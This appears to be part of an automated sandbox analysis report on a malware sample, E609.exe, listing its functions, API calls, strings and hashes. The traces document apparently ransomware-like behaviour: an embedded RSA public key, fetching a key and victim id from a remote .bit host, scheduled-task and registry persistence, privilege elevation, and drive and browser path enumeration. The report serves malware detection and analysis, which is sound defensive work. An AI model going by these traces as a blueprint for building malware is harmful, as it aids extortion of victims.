__invoke_watson.LIBCMT ref: 04AB2120
_strlen.LIBCMT ref: 04AB20D4

Part of subcall function 04A95BA8: __getptd_noexit.LIBCMT ref: 04A95BA8

_strnlen.LIBCMT ref: 04AB215F
__lock.LIBCMT ref: 04AB2170
__getenv_helper_nolock.LIBCMT ref: 04AB217B

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 3f8a2dd9f992578fdcc827a9e3341f44a963f26fe4a462cb506cca52cfb7da2c
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: 5631F833A05615AAFF217BA4AD087DE37EC9F05B28F104496E944EB281DB74BC0187E1

Function 04A82670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A826DB
_memset.LIBCMT ref: 04A82A30
_memset.LIBCMT ref: 04A82AC0

Strings

D, xrefs: 04A82AC8

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: eeefbeb6a24a4c3590dae8c2f2c27c8c132042c61683c70d1464624a2bd6aba6
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 59E14C72D00219ABDF24EFA0DD89FEEB7B8FF04704F1440A9E509A6190EB746A45CF54

Function 04A7D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A7D8EA

Strings

, xrefs: 04A7DADB
(, xrefs: 04A7DAE9
$, xrefs: 04A7DAE2

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 36c311968ceada7be7c8e3ce912311af427566ec193815fc75349d01f3d40816
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 0E91BD71D00218ABEF20DFA0CD59BEEBBF4AF15308F2445A9D405772C1DBB66A48CB65

Function 04A8A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A8A858
_memset.LIBCMT ref: 04A8A869
_memset.LIBCMT ref: 04A8A87A

Strings

p2Q, xrefs: 04A8A882

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: 1f5c5f4306327a1933c3e33152f7838c6e45dabc98093622072e0188ecfa2413
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: A6F0C968698750A5FB217750BD26B857ED17B31F08F144088E1182A2E1D2F9378CA7EA

Function 04ABFBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 04ABFBF1

Part of subcall function 04AA169C: std::exception::_Copy_str.LIBCMT ref: 04AA16B5

__CxxThrowException@8.LIBCMT ref: 04ABFC06

Strings

TeM, xrefs: 04ABFBFE
TeM, xrefs: 04ABFBFB, 04ABFBE7

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d6a25fb5ee6b1324cfff8d1f8f2b4c5e68750c76bea47028b8dcb787bcaec974
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: ADD06775C0020CBBDB00EFA5D559CDDBBB8AB04348F448466A91497241EB74A7598B95

Function 04A7D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 04A9197D: __wfsopen.LIBCMT ref: 04A91988

_fgetws.LIBCMT ref: 04A7D15C

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: d445af19e220c10dae3a79a98bc2101ccbf2fe063038a4c679f6bdef5a7ba688
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: C791AF72D00219ABEF30DFA4CD84BAEB7F5AF04314F140529E915A7240E77ABA15CBE5

Function 04A7D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 04A7D77E
_malloc.LIBCMT ref: 04A7D7B2
_malloc.LIBCMT ref: 04A7D7C1
_fprintf.LIBCMT ref: 04A7D815

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 688ed9f4979b133f935e0671c49c7e583e6d7081887a6b67df1a0a8355986742
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 3BA190B1C00248EBFF11EFE4CD45BDEBBB5AF14308F140468D40576291E7BA6A58CBA6

Function 04A92AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04A92B2E
__read_nolock.LIBCMT ref: 04A92BFE
__filbuf.LIBCMT ref: 04A92C21
_memset.LIBCMT ref: 04A92C65

Part of subcall function 04A95BA8: __getptd_noexit.LIBCMT ref: 04A95BA8

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: c23904256c0ef6efb82dce14778a2c591a2a69c55fdd75c523017c5977fa6a29
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: E851B176A00306FBDF299F6989807AE77F5AF50324F148BA9E835962D0E770BD50CB40

Function 04AB1359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 04AB137D

Part of subcall function 04AB1A9D: __fltout2.LIBCMT ref: 04AB1AC6

__cftog_l.LIBCMT ref: 04AB13A3
__cftoe_l.LIBCMT ref: 04AB13D5

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 89f06eb0d55cf17a9ba0b77aee43dd29de53d65c56096b65876616a83212d043
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: A301403240024EFBCF525F84DD11CED3F6ABB19394B488515FA9958432E336E5B2AB81

Function 04B37A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04B37A4B

Part of subcall function 04B38140: ___BuildCatchObjectHelper.LIBCMT ref: 04B38172
Part of subcall function 04B38140: ___AdjustPointer.LIBCMT ref: 04B38189

_UnwindNestedFrames.LIBCMT ref: 04B37A62
___FrameUnwindToState.LIBCMT ref: 04B37A74
CallCatchBlock.LIBCMT ref: 04B37A98

Memory Dump Source

Source File: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4a70000_E609.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: 8d2b1c2ca7e75d35d46a1bb144ac0d64d936a4040707c8abe11c2f47a6a379a7
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: C9011736000109BBDF12AF56CC00EDA3BBAEF48759F148054F91866120D732E962DBA0

Analysis Process: E609.exePID: 2764, Parent PID: 2844COMMON

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	1982
Total number of Limit Nodes:	40

Executed Functions

Function 00419F90 Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565COMMON

Download Yara Rule

APIs

Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6

GetCurrentProcess.KERNEL32 ref: 00419FC4
GetLastError.KERNEL32 ref: 00419FD2
SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
GetLastError.KERNEL32 ref: 00419FE4
GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,007FB5F0,?), ref: 0041A0BB
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
GetCommandLineW.KERNEL32(?,?), ref: 0041A161

Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C

Strings

C:\Program Files\Mozilla Firefox\, xrefs: 0041AF2D
D:\Windows\, xrefs: 0041AFF3
--ForNetRes, xrefs: 0041A22E
x2Q, xrefs: 0041A856
D:\Program Files\Internet Explorer\, xrefs: 0041B0CB
--Task, xrefs: 0041A2CD
D:\Program Files\Mozilla Firefox\, xrefs: 0041B0A8
7P, xrefs: 0041B164
%username%, xrefs: 0041B283
D:\Program Files\Google\, xrefs: 0041B0EE
x*P, xrefs: 0041ACE4
runas, xrefs: 0041A6CE
--AutoStart, xrefs: 0041A2EC
-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24, xrefs: 0041A255, 0041A37B, 0041A847, 0041A955, 0041A962, 0041A97F, 0041A980, 0041A9F2, 0041A9FF, 0041AA16, 0041AA17
C:\Program Files (x86)\Google\, xrefs: 0041AEE7
C:\Program Files (x86)\Internet Explorer\, xrefs: 0041AEA1
C:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041AE5B
--Admin, xrefs: 0041A1B4, 0041A632
D:\Program Files (x86)\Internet Explorer\, xrefs: 0041B062
IsNotTask, xrefs: 0041A654
<, xrefs: 0041A67B
C:\Program Files\Internet Explorer\, xrefs: 0041AF73
D:\Program Files (x86)\Google\, xrefs: 0041B085
IsAutoStart, xrefs: 0041A1D0, 0041A273
C:\Windows\, xrefs: 0041AE0F
--Service, xrefs: 0041A30B
D:\Program Files (x86)\Mozilla Firefox\, xrefs: 0041B02E
{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}, xrefs: 0041A8A0
{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}, xrefs: 0041A8B6
F:\, xrefs: 0041B397
list<T> too long, xrefs: 0041B669, 0041B673
IsTask, xrefs: 0041A1EE, 0041A299
C:\Program Files\Google\, xrefs: 0041AFB9
I:\5d2860c89d774.jpg, xrefs: 0041B32F
IsNotAutoStart, xrefs: 0041A645
X1P, xrefs: 0041A485

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
API String ID: 2957410896-526584959
Opcode ID: 1edb2e237a79b2b4ae5a4da75d993a068dfe183a2f65f8032ee2256dc2203c06
Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
Opcode Fuzzy Hash: 1edb2e237a79b2b4ae5a4da75d993a068dfe183a2f65f8032ee2256dc2203c06
Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

Function 00481920 Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExA.KERNEL32(00000094), ref: 00481983
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
FreeLibrary.KERNEL32(?), ref: 00481AC5
GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
FreeLibrary.KERNEL32(?), ref: 00481C15
LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
FreeLibrary.KERNEL32(?), ref: 00481D45
GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
GetTickCount.KERNEL32 ref: 00481F03
Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
Heap32Next.KERNEL32(?,?,?,?,?,B6EAEE0D), ref: 00481FE3
GetTickCount.KERNEL32 ref: 00481FF1
Heap32ListNext.KERNEL32(?,?), ref: 00482058
GetTickCount.KERNEL32 ref: 00482066
GetTickCount.KERNEL32 ref: 00482095
Process32First.KERNEL32(?,00000128), ref: 004820AA
GetTickCount.KERNEL32 ref: 004820FB
GetTickCount.KERNEL32 ref: 00482118
GetTickCount.KERNEL32 ref: 00482187
GetTickCount.KERNEL32 ref: 004821A4

Strings

CloseToolhelp32Snapshot, xrefs: 00481D7B
Process32Next, xrefs: 00481DED
CryptGenRandom, xrefs: 00481AE3
CryptReleaseContext, xrefs: 00481AF6
GetForegroundWindow, xrefs: 00481C4A
Thread32Next, xrefs: 00481E13
Heap32ListFirst, xrefs: 00481DB4
Module32First, xrefs: 00481E26
Heap32ListNext, xrefs: 00481DC7
CreateToolhelp32Snapshot, xrefs: 00481D67
USER32.DLL, xrefs: 00481C31
Heap32First, xrefs: 00481D8E
NetStatisticsGet, xrefs: 004819E2
LanmanServer, xrefs: 00481A74
Module32Next, xrefs: 00481E39
CryptAcquireContextW, xrefs: 00481AD5
ADVAPI32.DLL, xrefs: 00481989
Intel Hardware Cryptographic Service Provider, xrefs: 00481B9C
NETAPI32.DLL, xrefs: 004819A9
KERNEL32.DLL, xrefs: 0048199C
GetQueueStatus, xrefs: 00481C6B
Process32First, xrefs: 00481DDA
GetCursorInfo, xrefs: 00481C58
NetApiBufferFree, xrefs: 004819F0
Thread32First, xrefs: 00481E00
LanmanWorkstation, xrefs: 00481A26
$, xrefs: 00481F7E
Heap32Next, xrefs: 00481DA1

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
API String ID: 4174345323-1723836103
Opcode ID: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
Opcode Fuzzy Hash: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D

Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696
stringnetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0

Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700

_memset.LIBCMT ref: 0041E707

Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B

InternetOpenW.WININET ref: 0041E743
_wcsstr.LIBCMT ref: 0041E7AE
_memmove.LIBCMT ref: 0041E838
lstrcpyW.KERNEL32(?,?), ref: 0041E90A
lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
InternetCloseHandle.WININET(00000000), ref: 0041E9F3
InternetCloseHandle.WININET(00000000), ref: 0041E9F6
_strstr.LIBCMT ref: 0041EA36
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
DeleteFileA.KERNEL32(?), ref: 0041EA82
lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
lstrcpyA.KERNEL32(?,?), ref: 0041EABA
lstrlenA.KERNEL32(?), ref: 0041EAC8
lstrlenA.KERNEL32(00000022), ref: 0041EAE3
lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
lstrlenA.KERNEL32(?), ref: 0041EB7C
_malloc.LIBCMT ref: 0041EB86
_memset.LIBCMT ref: 0041EB94
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
_strstr.LIBCMT ref: 0041EBDA
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
DeleteFileA.KERNEL32(?), ref: 0041EC32
lstrlenW.KERNEL32(?), ref: 0041EC3E
lstrlenA.KERNEL32(","id":"), ref: 0041EC51
lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
lstrlenA.KERNEL32(?), ref: 0041EC93
lstrlenA.KERNEL32(00000022), ref: 0041ECB3
lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
lstrlenA.KERNEL32(?), ref: 0041ED4B
_malloc.LIBCMT ref: 0041ED55
_memset.LIBCMT ref: 0041ED63
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
lstrlenW.KERNEL32(?), ref: 0041EDA3
lstrlenW.KERNEL32(?), ref: 0041EDAE
SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
DeleteFileA.KERNEL32(?), ref: 0041EE05
_free.LIBCMT ref: 0041EE15
_free.LIBCMT ref: 0041EE22
lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF

Strings

&first=true, xrefs: 0041E930
?pid=, xrefs: 0041E884
bowsakkdestx.txt, xrefs: 0041E996, 0041EA67, 0041EC17, 0041EDEA
.bit/, xrefs: 0041E7A3
", xrefs: 0041ECA0
&first=false, xrefs: 0041E937
{"public_key":", xrefs: 0041EA2E, 0041EA8D
","id":", xrefs: 0041EBC5, 0041EC4C
Microsoft Internet Explorer, xrefs: 0041E736

Memory Dump Source

Source File: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.2873162135.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2873162135.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_E609.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
API String ID: 704684250-3586605218
Opcode ID: 6bb2b37fa8f33f4e42fac9bac8f14efb082cebc4ba882b8752c2bd9b785744bc
Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
Opcode Fuzzy Hash: 6bb2b37fa8f33f4e42fac9bac8f14efb082cebc4ba882b8752c2bd9b785744bc
Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 0040D26C
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
VariantInit.OLEAUT32(?), ref: 0040D2F0
VariantInit.OLEAUT32(?), ref: 0040D309
VariantInit.OLEAUT32(?), ref: 0040D322
VariantInit.OLEAUT32(?), ref: 0040D33B
VariantClear.OLEAUT32(?), ref: 0040D397
VariantClear.OLEAUT32(?), ref: 0040D3A4
VariantClear.OLEAUT32(?), ref: 0040D3B1
VariantClear.OLEAUT32(?), ref: 0040D3C2
CoUninitialize.OLE32 ref: 0040D3D5

Strings

%Y-%m-%dT%H:%M:%S, xrefs: 0040D790
Author Name, xrefs: 0040D4C8
RegisterTaskDefinition. Err: %X, xrefs: 0040DA11
2030-05-02T08:00:00, xrefs: 0040D737
Time Trigger Task, xrefs: 0040D43C, 0040D973
PT5M, xrefs: 0040D5A1, 0040D66C
Trigger1, xrefs: 0040D6FA
--Task, xrefs: 0040D8DD

